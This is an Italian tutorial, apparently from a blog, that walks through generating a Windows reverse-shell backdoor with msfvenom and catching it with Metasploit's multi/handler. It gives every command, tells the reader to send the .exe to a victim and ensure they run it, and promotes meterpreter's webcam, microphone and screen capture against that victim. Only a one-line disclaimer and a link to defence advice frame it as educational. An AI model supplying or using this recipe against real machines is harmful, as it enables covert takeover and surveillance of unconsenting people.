Quanto scritto funziona solo in rete locale, ergo, potrete attaccare un pc connesso alla vostra stessa rete.

Abbiamo già parlato di Metasploit e abbiamo visto come configurarlo al primo avvio, clicca qui.

Quello che andremo a creare è un BackDoor ossia un software capace di farci prendere il pieno controllo della macchina attaccata, in questo caso, faremo un attacco ad un sistema Windows.

Apriamo il terminale come utente root dunque digitiamo:

su

Inseriamo la nostra password o di default toor

Adesso ci servono alcune informazioni per poter creare il nostro payload

  • Il nostro ip interno alla rete locale [LHOST]

Per conoscere il nostro ip basta digitare in terminale il seguente comando:

ifconfig

Riceveremo in output le schede Ethernet (eth0) e Wireless (wlan0).

Prendiamo nota dell’ip sotto la voce inet (192.xxx.xxx.xxx) della scheda che stiamo utilizzando.

Nel mio caso sto utilizzando la scheda wlan0 e l’ip interno alla rete locale è 192.168.1.2

Spostiamoci nella directory in cui vogliamo salvare il file generato, nel mio caso lo voglio in scrivania (desktop):

cd /home/manu/Scrivania

Digitiamo il comando:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=[il tuo ip] LPORT=[una porta a piacere] -f exe > [un nome a piacere].exe

Abbiamo -p (payload) nel nostro caso meterpreter consente di iniettare DLL nella macchina della vittima e lavora solo su RAM senza lasciare file sul disco, -f (formato del file che vogliamo generare).

Non abbiamo incluso nel comando l’architettura del sistema (-a), verrà generato automaticamente con l’architettura a 32 bit = x86, e la piattaforma (–platform) nel caso abbiate una preferenza specifica basta inserire prima di LHOST il comando:

...reverse_tcp -a x64 --platform windows LHOST=...

 Comparirà sulla nostra Scrivania il file appena creato.

Ora basta solo inviarlo alla vittima e assicurarci che lo esegua!

Nel frattempo avviamo la nostra console per metterci in ascolto con il nostro payload avviando l’exploit!

Dunque digitiamo in terminale:

systemctl start postgresql

msfconsole

db_status

Digitiamo:

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost [IP utilizzato nella creazione del payload]

set lport [Porta utilizzata nella creazione del payload]

run

A questo punto dobbiamo solo aspettare che la nostra vittima esegua il file inviato!

Partito meterpreter possiamo digitare help per avere la lista di tutti i comandi da eseguire, ad esempio scattare foto dalla webcam o avviare la registrazione del microfono, catturare il desktop, avviare la navigazione delle directory e molto altro!

Manca una cosa però, se l’utente riavvia il pc dovremmo aspettare che nuovamente avvii il nostro virus.

Come difenderti da cose simili?? LEGGI QUI

Attenzione: Questa guida è stata scritta solo a scopo didattico non mi assumo nessuna responsabilità per le vostre azioni illegali o danni causati. ricordo che la violazione della privacy e danni causati tramite mezzi informatici, sono puniti penalmente!